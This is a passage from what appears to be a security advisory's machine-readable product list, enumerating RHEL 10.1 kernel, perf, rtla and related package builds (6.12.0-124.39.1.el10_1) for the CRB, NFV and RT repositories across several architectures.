"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
